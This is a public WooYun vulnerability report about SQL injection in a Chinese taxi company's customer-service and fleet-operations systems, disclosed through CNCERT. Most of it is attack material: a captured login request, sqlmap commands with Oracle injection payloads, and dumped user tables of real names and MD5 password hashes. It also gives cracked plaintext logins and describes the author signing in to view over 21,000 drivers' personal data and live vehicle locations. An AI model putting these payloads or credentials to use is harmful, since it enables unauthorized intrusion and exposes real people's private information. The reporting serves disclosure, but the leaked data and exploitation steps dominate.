当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147292

漏洞标题:出租车行业第二弹之看我如何实时监控某城市1W多辆出租车的(2W多司机个人信息泄漏)

相关厂商:天泽信息产业股份有限公司

漏洞作者: 洞主

提交时间:2015-10-17 08:49

修复时间:2015-12-05 15:10

公开时间:2015-12-05 15:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-17: 细节已通知厂商并且等待厂商处理中
2015-10-21: 厂商已经确认,细节仅向厂商公开
2015-10-31: 细节向核心白帽子及相关领域专家公开
2015-11-10: 细节向普通白帽子公开
2015-11-20: 细节向实习白帽子公开
2015-12-05: 细节向公众公开

简要描述:

说实话,这次真的很头疼,原因是这台SQL服务器承载了2个应用,一个是出租车的客服系统,一个是出租车智慧运营系统。第一个系统很快拿到了登录后台的用户名和密码,第二个却折腾了很久,原因是我根据系统的url路径找到了可能的数据库名称为:MIS、MISTZ、SZTZMIS这三个中的之一,但这个3个库中user表跑出来的结果没有admin这个用户(我一只在这钻了牛角尖,因为根据尝试登录的结果判断存在admin这个用户)后来发现整的错了。具体过程见详细说明。

详细说明:

我的目标url是这个 http://**.**.**.**/taxi4mis/Area/nanjing/QyzxPage.aspx

1.jpg


用admin和任意密码尝试登录,提示密码错误:

2.jpg


由此我确定了存在admin用户,加上由于没有错误限制,也没有验证码,用burpsuit暴力破解无果。
从客服系统入手,发现存在SQL注入
http请求内容为:

POST /CMS/Logon.aspx HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://**.**.**.**/CMS/Logon.aspx
Content-Length: 216
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: token=1844069a-3d9d-4e3c-9952-932ff5db652e; ASP.NET_SessionId=b5bwlpz0yq5xlz55bbpwgw55
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
btnLogin=%a6%cc%3f%3f%3f&txtLogon=1&txtPassword=g00dPa%24%24w0rD&__EVENTVALIDATION=/wEWBAKiu4CwCQLk%2b/7kCQK1qbSRCwKC3IeGDDzjk0qJrdfVKQdxblh4NH6/UqUU&__VIEWSTATE=/wEPDwUKMjA3ODAyNTg3M2RkEJwVGm7FHDD6SKuQJajtwNyZs4k%3d


其中参数txtlogon存在注入:
SQLMAP跑一下,结果为:

C:\Python27\sqlmap1.0\sqlmap>sqlmap.py -r d:\7.txt --current-user --is-dba
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150915}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 21:47:54
d:\7.txt
[21:47:54] [INFO] parsing HTTP request from 'd:\7.txt'
d:\7.txt
[21:47:54] [INFO] resuming back-end DBMS 'oracle'
[21:47:54] [INFO] testing connection to the target URL
[21:47:54] [INFO] heuristically checking if the target is protected by some kind
of WAF/IPS/IDS
[21:47:54] [INFO] it appears that the target is not protected
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: txtLogon (POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: btnLogin=%a6%cc???&txtLogon=1') AND 3967=(SELECT UPPER(XMLType(CHR(
60)||CHR(58)||CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113)||(SELECT (CASE WH
EN (3967=3967) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(120)||CHR(
107)||CHR(113)||CHR(62))) FROM DUAL) AND ('ebie'='ebie&txtPassword=g00dPa$$w0rD&
__EVENTVALIDATION=/wEWBAKiu4CwCQLk+/7kCQK1qbSRCwKC3IeGDDzjk0qJrdfVKQdxblh4NH6/Uq
UU&__VIEWSTATE=/wEPDwUKMjA3ODAyNTg3M2RkEJwVGm7FHDD6SKuQJajtwNyZs4k=
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: btnLogin=%a6%cc???&txtLogon=1') AND 2523=DBMS_PIPE.RECEIVE_MESSAGE(
CHR(99)||CHR(113)||CHR(89)||CHR(118),5) AND ('nJhK'='nJhK&txtPassword=g00dPa$$w0
rD&__EVENTVALIDATION=/wEWBAKiu4CwCQLk+/7kCQK1qbSRCwKC3IeGDDzjk0qJrdfVKQdxblh4NH6
/UqUU&__VIEWSTATE=/wEPDwUKMjA3ODAyNTg3M2RkEJwVGm7FHDD6SKuQJajtwNyZs4k=
---
[21:47:54] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
[21:47:54] [INFO] fetching current user
[21:47:54] [INFO] resumed: CMS
current user: 'CMS'
[21:47:54] [INFO] testing if current user is DBA
current user is DBA: True


数据库用户名CMS,权限DBA
存在的数据库有:

dbs
available databases [19]:
[*] APPQOSSYS
[*] CMS
[*] DBSNMP
[*] EXFSYS
[*] MAPINFO
[*] MCC2
[*] MDSYS
[*] MIS
[*] MISTZ
[*] NJKG
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] SZTZMIS
[*] WMSYS
[*] XDB


先从CMS库入手,得到表如下:

---
Parameter: txtLogon (POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: btnLogin=%a6%cc???&txtLogon=1') AND 3967=(SELECT UPPER(XMLType(CHR(
60)||CHR(58)||CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113)||(SELECT (CASE WH
EN (3967=3967) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(120)||CHR(
107)||CHR(113)||CHR(62))) FROM DUAL) AND ('ebie'='ebie&txtPassword=g00dPa$$w0rD&
__EVENTVALIDATION=/wEWBAKiu4CwCQLk+/7kCQK1qbSRCwKC3IeGDDzjk0qJrdfVKQdxblh4NH6/Uq
UU&__VIEWSTATE=/wEPDwUKMjA3ODAyNTg3M2RkEJwVGm7FHDD6SKuQJajtwNyZs4k=
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: btnLogin=%a6%cc???&txtLogon=1') AND 2523=DBMS_PIPE.RECEIVE_MESSAGE(
CHR(99)||CHR(113)||CHR(89)||CHR(118),5) AND ('nJhK'='nJhK&txtPassword=g00dPa$$w0
rD&__EVENTVALIDATION=/wEWBAKiu4CwCQLk+/7kCQK1qbSRCwKC3IeGDDzjk0qJrdfVKQdxblh4NH6
/UqUU&__VIEWSTATE=/wEPDwUKMjA3ODAyNTg3M2RkEJwVGm7FHDD6SKuQJajtwNyZs4k=
---
[21:50:16] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
[21:50:16] [INFO] fetching tables for database: 'CMS'
[21:50:16] [INFO] the SQL query used returns 82 entries
Database: CMS
[82 tables]
+-----------------------------+
| ABUG |
| BUGCAR |
| CMS_APP_CODE |
| CMS_CALLBLACK |
| CMS_CALLBLACK_LOG |
| CMS_CALLBLACK_TEMP |
| CMS_CUSTOM_APPEAL |
| CMS_CUSTOM_CAT |
| CMS_CUSTOM_MAP |
| CMS_CUSTOM_VISIT |
| CMS_DISPATCH_ADDRESS |
| CMS_DISPATCH_MEMBER |
| CMS_DISPATCH_MEMBERLOGS |
| CMS_DISPATCH_OPERLOGS |
| CMS_DISPATCH_VBLACK |
| CMS_DISPATCH_VBLACK_LOG |
| CMS_DISPATCH_VIP |
| CMS_ERCODE |
| CMS_EXRST_DANGER_LQ |
| CMS_EXRST_EXT |
| CMS_EXRST_LQ |
| CMS_EXRST_LT |
| CMS_EXRST_YX |
| CMS_EXRST_YX_TMP |
| CMS_EXTMP_DANGER_LQ |
| CMS_EXTMP_LQ |
| CMS_EXTMP_LT |
| CMS_EXTMP_YX |
| CMS_EXTMP_YXFIX |
| CMS_EXTMP_YX_OLD |
| CMS_GJDATA_COMPANY |
| CMS_GJDATA_VEHICLE |
| CMS_LQDATA_COMPANY |
| CMS_LQDATA_VEHICLE |
| CMS_LQDATA_VEHICLEDRIVER |
| CMS_ODOMETER_STAT |
| CMS_ODOMETER_TRACK |
| CMS_ODOMETER_VEHICLE |
| CMS_PROCESS_LOG |
| CMS_REPAIR_BILL |
| CMS_REPAIR_BILLDETAIL |
| CMS_REPAIR_BILLOLD |
| CMS_REPAIR_COMP |
| CMS_REPAIR_RENT |
| CMS_TEMP_LIST |
| CMS_USER_DEPT |
| CMS_USER_STAFF |
| CMS_USER_WORKORDER |
| CMS_USER_WORKORDERDETAIL |
| CMS_VEHICLE_BLACK |
| CMS_VEHICLE_DREXAUTH |
| CMS_VEHICLE_DRIVER |
| CMS_VEHICLE_EXCODE |
| CMS_VEHICLE_FEE |
| CMS_VEHICLE_FEELOG |
| CMS_VEHICLE_FEEVERIFY |
| CMS_VEHICLE_FEEVERIFY_ITEM |
| CMS_VEHICLE_FEE_BAK |
| CMS_VEHICLE_HISTORY |
| CMS_VEHICLE_STATE |
| CMS_VSTATE_LOGS |
| CMS_WORK_SETUP |
| CMS_WORK_USER |
| CMS_YXDATA_COMPANY |
| CMS_YXDATA_PICKLOAD |
| CMS_YXDATA_VEHICLE |
| CMS_YXDATA_VEHICLE_DETAIL |
| CMS_YXDATA_VEHICLE_DRIVER |
| CMS_YXDATA_VEHICLE_EXT |
| CMS_YXDATA_VEHICLE_GROUP |
| CMS_YXDATA_VEHICLE_TEARDOWN |
| CREATE$JAVA$LOB$TABLE |
| JAVA$OPTIONS |
| MIS_SYS_AUTH |
| MIS_SYS_GROUP |
| MIS_SYS_GROUPCOM |
| MIS_SYS_LOG |
| MIS_SYS_MODULE |
| MIS_SYS_ROLE |
| MIS_SYS_SUBAUTH |
| MIS_SYS_SUBSYSTEM |
| MIS_SYS_USER |
+-----------------------------+


猜测用户名和密码在MIS_SYS_USER中
SQLMAP跑了一下结果如下:

Database: CMS
Table: MIS_SYS_USER
[73 entries]
+-------------+-------------+----------------------------------+
| LOGON | USERNAME | PASSWORD |
+-------------+-------------+----------------------------------+
| taxiling | 陵光出租车 | E10ADC3949BA59ABBE56E057F20F883E |
| taximinf | 民福出租公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxiyuh | 雨花客运出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxifeiy | 飞元出租 | E10ADC3949BA59ABBE56E057F20F883E |
| taxidongf | 东方出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxiwuh | 五环出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| njtz | 南京天泽 | E10ADC3949BA59ABBE56E057F20F883E |
| taxijinlong | 金龙客运出租 | E10ADC3949BA59ABBE56E057F20F883E |
| admin | 王曦 | 24E7A730FF315B8BB4F013A282B98EBD |
| taxizhongyx | 中宇翔出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxijing | 南京金宫出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxihaib | 海博客运出租 | 03AE98008F524E8692997F65DEC066A7 |
| taxijinl | 金陵交运出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxihongd | 宏达出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxiningk | 宁垦客运出租公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxijiangn | 江南客运出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taximoc | 莫愁出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| liull | 刘丽丽 | EA34BC1E200ED2E54FDAEFF583E9E3F8 |
| zhush | 猪声华 | 1A1F2DB3475B1B8F54AF76C4C5F94A38 |
| light | 顶灯维修 | E10ADC3949BA59ABBE56E057F20F883E |
| taxidings | 丁山汽车 | E10ADC3949BA59ABBE56E057F20F883E |
| taxijiangh | 江海出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxijinb | 金宝客运出租公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxitianr | 天润客运出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxishujj | 舒佳捷客运出租 | E10ADC3949BA59ABBE56E057F20F883E |
| taxiyinkr | 迎客隆客运公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxinanl | 南京市南粮客运公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxilaidl | 来得利沧海出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxiaol | 奥林客运 | E10ADC3949BA59ABBE56E057F20F883E |
| taxijiaot | 交通客运公司 | 493422B9AF1EEB214593BA7C120EE2B8 |
| taxiwais | 江苏外事旅游汽车公司 | A3E1C36D8135CFD3AF045536D855A733 |
| taxikangdw | 康达维出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxishund | 顺达出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxidaj | 大件客运出租汽车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| xiaw | 夏玮 | E10ADC3949BA59ABBE56E057F20F883E |
| xujun | 徐俊 | E10ADC3949BA59ABBE56E057F20F883E |
| bianxw | 卞学维 | E10ADC3949BA59ABBE56E057F20F883E |
| ty | 通用维修 | E10ADC3949BA59ABBE56E057F20F883E |
| wohj | 沃菡菁 | ED0F6AE3D56AD5719038A63ECF2C0CD1 |
| zhouhb | 周海波 | 9854F4588EA3A665A9C08F678406E3C5 |
| taxideh | 德华出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxizhongb | 中北出租车公司 | FD15D718A540A9F833396E4CBCFD7A0E |
| taxinongk | 农垦出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxidongh | 东华出租 | E10ADC3949BA59ABBE56E057F20F883E |
| taxijiafl | 江苏佳弗林出租公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxikanh | 康宏出租公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxiyuanl | 南京园林出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxifad | 发达旅游 | E10ADC3949BA59ABBE56E057F20F883E |
| taxizhij | 紫金出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxidaf | 江苏大方经营公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxizhuj | 珠江出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxihualf | 华立发出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxikail | 凯利客运 | E10ADC3949BA59ABBE56E057F20F883E |
| taxiget | 个体 | E10ADC3949BA59ABBE56E057F20F883E |
| zhushb | 朱守保 | 9033E0E305F247C0C3C80D0C7848C8B3 |
| zhouyn | 周永宁 | E10ADC3949BA59ABBE56E057F20F883E |
| jstzfwb | 江苏天泽服务部 | E10ADC3949BA59ABBE56E057F20F883E |
| maj | 马金 | E10ADC3949BA59ABBE56E057F20F883E |
| taxiyongl | 永隆出租公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxidajin | 大金客运公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxizhend | 振得出租公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxilians | 联盛客运 | E10ADC3949BA59ABBE56E057F20F883E |
| taxijinsh | 金圣鸿客运出租 | E10ADC3949BA59ABBE56E057F20F883E |
| taxiyingt | 应天出租公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxiningg | 南京宁港客运 | E10ADC3949BA59ABBE56E057F20F883E |
| taxizhongq | 中侨客运出租 | E10ADC3949BA59ABBE56E057F20F883E |
| taxisuh | 苏华公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxitianp | 天鹏出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxizhongsl | 中山陵出租车公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxizhongx | 中心大酒店客运有限公司 | E10ADC3949BA59ABBE56E057F20F883E |
| taxilongzq | 龙之泉出租公司 | E10ADC3949BA59ABBE56E057F20F883E |
| zonghzx | zonghzx | 868042C521F2F64AD57BF72F6F518CC2 |
| qiuj | 邱静 | 133BE18DB8B88774782386F4CA3D8809 |
+-------------+-------------+----------------------------------+


以最后一个帐号qiuj为例对其密码进行MD5解密,得到密码为:810712
尝试登录客服系统:http://**.**.**.**/CMS/Logon.aspx
成功登录:

3.jpg


好了,这里结束,下面我们继续另一个系统。
http://**.**.**.**/taxi4mis/Area/nanjing/QyzxPage.aspx
突然有事,直接说重点了,目标在Database: SZTZMIS Table: APP_STAFF中
SQLMAP直接跑一下用结果如下:

Database: SZTZMIS
Table: APP_STAFF
[138 entries]
+--------------+----------------------------------+------------+
| LOGIN | USERPWD | STAFFNAME |
+--------------+----------------------------------+------------+
| zhushb | E10ADC3949BA59ABBE56E057F20F883E | 网管朱守保 |
| kfguly | NULL | 客服顾梁艳 |
| liurx | 202CB962AC59075B964B07152D234B70 | 天泽刘瑞香 |
| zhangh | 54FFC0B9166EFB0F4CB49D0FFDC5FE39 | 研发张华 |
| wangx | 54FFC0B9166EFB0F4CB49D0FFDC5FE39 | 研发王曦 |
| luks | 54FFC0B9166EFB0F4CB49D0FFDC5FE39 | 研发卢克松 |
| caowy | 54FFC0B9166EFB0F4CB49D0FFDC5FE39 | 研发曹文宇 |
| huangh | 202CB962AC59075B964B07152D234B70 | 研发黄河 |
| shimh | 44360CD19BFB7FDF759FE2E6BCC423FB | 史梦华 |
| nj_jiangswq | A3E1C36D8135CFD3AF045536D855A733 | 江苏外汽 |
| nj_tianp | C68684699DF1D960BD12B4527FCCE8A2 | 天鹏 |
| nj_lingg | E10ADC3949BA59ABBE56E057F20F883E | 陵光 |
| yuanl | E10ADC3949BA59ABBE56E057F20F883E | 袁玲 |
| zonghzx | FFB7AF2385BA72E00BF5EE31A6FE15EA | 南京综合坐席 |
| shixm | E10ADC3949BA59ABBE56E057F20F883E | 研发施晓明 |
| qiuj | DC7A2C77B3D50D2023AAEE921BC3A899 | 邱静 |
| nj_ningk | E10ADC3949BA59ABBE56E057F20F883E | 宁垦 |
| hongyun | E10ADC3949BA59ABBE56E057F20F883E | hongyun |
| nj_jgj | E10ADC3949BA59ABBE56E057F20F883E | 交通局 |
| lvxm | E10ADC3949BA59ABBE56E057F20F883E | 吕学明 |
| qazyc | E10ADC3949BA59ABBE56E057F20F883E | 青奥专用车 |
| xiaw | E10ADC3949BA59ABBE56E057F20F883E | 夏玮 |
| qixia | E10ADC3949BA59ABBE56E057F20F883E | 栖霞大组 |
| nj_minf | E10ADC3949BA59ABBE56E057F20F883E | 民福 |
| nj_dehua | E10ADC3949BA59ABBE56E057F20F883E | 德华 |
| shenah | 3AE7666918CAE9DCBB79C8C1F0A9951D | 客服沈爱华 |
| jiangnan | E10ADC3949BA59ABBE56E057F20F883E | jiangnan |
| kgc1 | E10ADC3949BA59ABBE56E057F20F883E | 客管处 |
| nj_jing | E10ADC3949BA59ABBE56E057F20F883E | 金宫 |
| xiaguan | E10ADC3949BA59ABBE56E057F20F883E | 下关大组 |
| weixiu | E10ADC3949BA59ABBE56E057F20F883E | 维修点 |
| nj_yuhky | NULL | 雨花客运 |
| nj_kegc | 3C92A09BBDDD64A61662BB84ABB9094A | 客管处 |
| nj_dajin | E10ADC3949BA59ABBE56E057F20F883E | 大金 |
| zhenggb | E10ADC3949BA59ABBE56E057F20F883E | 郑国斌 |
| nj_geti | E10ADC3949BA59ABBE56E057F20F883E | 个体 |
| baixia | E10ADC3949BA59ABBE56E057F20F883E | 白下大组 |
| xuanwu | E10ADC3949BA59ABBE56E057F20F883E | 玄武大组 |
| njgjfjkk | 29035CB84ABC6E8636E44F83300D1C9C | 南京公交分局卡口大队 |
| zonghe | E10ADC3949BA59ABBE56E057F20F883E | 综合大组 |
| nj_hualf | 5E1B807F3B5D7045782891F42149D82C | 华立发 |
| nj_kegctsk | E10ADC3949BA59ABBE56E057F20F883E | 客管处投诉科 |
| zb2 | E10ADC3949BA59ABBE56E057F20F883E | zb2 |
| jxh | 868042C521F2F64AD57BF72F6F518CC2 | 南京客服周永宁 |
| gejiajia | 868042C521F2F64AD57BF72F6F518CC2 | 葛佳佳 |
| huhuan | E10ADC3949BA59ABBE56E057F20F883E | 胡欢 |
| zb3 | E10ADC3949BA59ABBE56E057F20F883E | zb3 |
| gulou | E10ADC3949BA59ABBE56E057F20F883E | 鼓楼大组 |
| nj_shund | 21B46D025A9716139077C4081E8B89CA | 顺达 |
| jianye | E10ADC3949BA59ABBE56E057F20F883E | 建邺大组 |
| nj_hongd | E10ADC3949BA59ABBE56E057F20F883E | 宏达 |
| xiaoyq | 0223AF7AD7FB3306B85427E92DE59BFD | 客服肖玉强 |
| nj_zhongsl | E10ADC3949BA59ABBE56E057F20F883E | 中山陵 |
| nj_jicha | 5A2A923A38BC0D6566AB39AEE9482D0E | 南京稽查 |
| nj_laidl | E10ADC3949BA59ABBE56E057F20F883E | 来得利 |
| szshichyxb | E10ADC3949BA59ABBE56E057F20F883E | 市场营销部 |
| nj_jiangn | 152BD17A28304C58E6ED65DCB718E96F | 江南 |
| yangh | 868042C521F2F64AD57BF72F6F518CC2 | yangh |
| nj_jiaot | 08BA4E1FD467AF7DFA50DB04C2BAEC07 | 交通 |
| xinky | FD1D4B828109DB06F77C20457002A662 | 天泽辛总 |
| qianh | E10ADC3949BA59ABBE56E057F20F883E | 网管钱慧 |
| zb4 | E10ADC3949BA59ABBE56E057F20F883E | zb4 |
| nj_nongk | E10ADC3949BA59ABBE56E057F20F883E | 农垦 |
| nj_jiafl | E10ADC3949BA59ABBE56E057F20F883E | 佳弗林 |
| wohj | ED0F6AE3D56AD5719038A63ECF2C0CD1 | 客服沃菡菁 |
| nj_jiangh | E10ADC3949BA59ABBE56E057F20F883E | 江海 |
| qinhuai | E10ADC3949BA59ABBE56E057F20F883E | 秦淮大组 |
| nj_jiangswq4 | E10ADC3949BA59ABBE56E057F20F883E | 江苏外汽 |
| nj_anqj | E10ADC3949BA59ABBE56E057F20F883E | 南京市国家安全局 |
| zb5 | E10ADC3949BA59ABBE56E057F20F883E | zb5 |
| zb6 | E10ADC3949BA59ABBE56E057F20F883E | zb6 |
| nj_longzq | E10ADC3949BA59ABBE56E057F20F883E | 龙之泉 |
| zhongb | E10ADC3949BA59ABBE56E057F20F883E | zb8 |
| nj_jiangswq1 | E10ADC3949BA59ABBE56E057F20F883E | 江苏外汽 |
| tzyuanxw | 868042C521F2F64AD57BF72F6F518CC2 | 袁欣蔚 |
| pujh | E10ADC3949BA59ABBE56E057F20F883E | 网管濮军华 |
| nj_zhongb1 | E10ADC3949BA59ABBE56E057F20F883E | zb2 |
| nj_yongl | B0D3D5B734C144FB2646B3A5A451F8B1 | 永隆 |
| nj_jinb | 4D2DB5B400A3164C7F74E3DB88ECE949 | 金宝 |
| kegcw | E10ADC3949BA59ABBE56E057F20F883E | 南京客管处王大 |
| zhongb1 | E10ADC3949BA59ABBE56E057F20F883E | zb5 |
| xiatt | EA34BC1E200ED2E54FDAEFF583E9E3F8 | 刘丽丽 |
| nj_gongjzafj | 8693355E926E5E55805458BE30A81C86 | 公交治安分局 |
| lidn | 40CC1BF3076430CB609255BDC14E2AEF | 客服李东宁 |
| zb1 | E10ADC3949BA59ABBE56E057F20F883E | zb1 |
| 15850007802 | 4142D7CB881025A9FB81D6E111F667DC | 天泽王燕 |
| maj | E10ADC3949BA59ABBE56E057F20F883E | 马金 |
| kegcc | E10ADC3949BA59ABBE56E057F20F883E | 客管处陈处 |
| zhouhb | 9854F4588EA3A665A9C08F678406E3C5 | 周海波 |
| kgc2 | E10ADC3949BA59ABBE56E057F20F883E | 南京客管处机场办公室 |
| zhush | 90449EC718C6D4BA4AD81CD679C19CE5 | 网管朱声华 |
| nj_feiy | E10ADC3949BA59ABBE56E057F20F883E | 飞元 |
| zongb | E10ADC3949BA59ABBE56E057F20F883E | 研发宗波 |
| nj_ruij | E10ADC3949BA59ABBE56E057F20F883E | 瑞金 |
| nj_zhongxdjd | E10ADC3949BA59ABBE56E057F20F883E | 中心大酒店 |
| zb7 | E10ADC3949BA59ABBE56E057F20F883E | zb7 |
| nj_jinljy | 0CACFCE1D0512CFFBBAB65D1AC1187A5 | 金陵交运 |
| QAZYC | E10ADC3949BA59ABBE56E057F20F883E | QAZYC |
| njqx | E10ADC3949BA59ABBE56E057F20F883E | 南京市公安局栖霞分局 |
| nj_zhongq | E10ADC3949BA59ABBE56E057F20F883E | 中侨 |
| xuj | E10ADC3949BA59ABBE56E057F20F883E | 徐俊 |
| nj_yingt | E10ADC3949BA59ABBE56E057F20F883E | 应天 |
| nj_fadly | E10ADC3949BA59ABBE56E057F20F883E | 发达旅游 |
| huzy | 6A61D423D02A1C56250DC23AE7FF12F3 | 胡紫莹 |
| nj_xinny | 28BA576FBDE77E0EC06E7CAEE261A5CF | 河西新能源公司 |
| nj_zijin | E10ADC3949BA59ABBE56E057F20F883E | 紫金 |
| nj_dingsbg | E10ADC3949BA59ABBE56E057F20F883E | 丁山宾馆 |
| nj_jiangswq2 | E10ADC3949BA59ABBE56E057F20F883E | 江苏外汽 |
| nj_jiny | 03AE98008F524E8692997F65DEC066A7 | 海博 |
| nj_dongh | F379EAF3C831B04DE153469D1BEC345E | 东华 |
| nj_dongf | 7D3E29792DE6708B9602A5E6BF874920 | 东方 |
| 18171511977 | 665DAC50DB0B2E202536EB82C8213A79 | 周雅琪 |
| njczxhlq | E10ADC3949BA59ABBE56E057F20F883E | 出租车协会凌强 |
| huay | E10ADC3949BA59ABBE56E057F20F883E | 研发华莹 |
| nj_jinl | E10ADC3949BA59ABBE56E057F20F883E | 金龙 |
| nj_jiangswq3 | E10ADC3949BA59ABBE56E057F20F883E | 江苏外汽 |
| nj_zhuj | E10ADC3949BA59ABBE56E057F20F883E | 珠江 |
| nj_lians | E10ADC3949BA59ABBE56E057F20F883E | 联盛 |
| zb_test | E10ADC3949BA59ABBE56E057F20F883E | zb_test |
| nj_jinsh | E10ADC3949BA59ABBE56E057F20F883E | 金圣鸿 |
| nj_tianr | E10ADC3949BA59ABBE56E057F20F883E | 天润 |
| nj_zhongyx | E10ADC3949BA59ABBE56E057F20F883E | 中宇翔 |
| nj_nanl | E10ADC3949BA59ABBE56E057F20F883E | 南粮 |
| nj_aolin | 924C7E536F236B9220C143A95376B99B | 奥林 |
| nj_wuhuan | 5EFCF6AD38475020B2FFD2D781BED0FC | 五环 |
| nj_yingkl | 2B9B41DA511500EBE749218CBAAA9695 | 迎客隆 |
| nj_kangdw | E10ADC3949BA59ABBE56E057F20F883E | 康达维 |
| nj_suhua | 4D73130E7F39287A0B8332D9A79C2CE3 | 苏华 |
| nj_shujj | E10ADC3949BA59ABBE56E057F20F883E | 舒佳捷 |
| nj_dajian | E10ADC3949BA59ABBE56E057F20F883E | 大件 |
| nj_zhongb | 016C8EF7179BDD6A5D0E54F4849B55ED | 中北 |
| nj_kail | E10ADC3949BA59ABBE56E057F20F883E | 凯利 |
| nj_zhend | 364D091F445D9C31C3960487FCA3B48D | 振得 |
| nj_yuanlsy | E10ADC3949BA59ABBE56E057F20F883E | 园林实业 |
| nj_mochou | 920E3DD48019D17A5E474D9472FB21E4 | 莫愁 |
| nj_ningg | 807FA09EC9DABD46623FAE85CBEECD1F | 宁港 |
| nj_dafjy | D69B06CC9FB33AD4E5CB6E6046614962 | 大方经营 |
| nj_kangh | B295CE4B19F2DD1A15CFBDBA4BCC3789 | 康宏 |
+--------------+----------------------------------+------------+


以南京公交分局卡口大队的帐号njgjfjkk为例,反解29035CB84ABC6E8636E44F83300D1C9C密码为:gjfjza

4.jpg


成功登录(还有多个账户可登录,
zb2 123456
hongyun 123456
jiangnan 123456
QAZYC 123456)
其它没有一一尝试
njgjfjkk登录后可查看全市21220位司机的个人信息(姓名、手机、身份证号码、车队,学历等)

7.jpg

6.jpg

5.jpg


监控所有车辆目前位置:

8.jpg


漏洞证明:

已证明,忘记加码的地方麻烦审核人员帮加个马赛克,谢谢!

修复方案:

1.参数过滤
2、修复弱口令

版权声明:转载请注明来源 洞主@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-21 15:08

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-10-17 09:11 | 洞主 ( 实习白帽子 | Rank:55 漏洞数:10 | 喜欢大长腿)

    准备第三弹中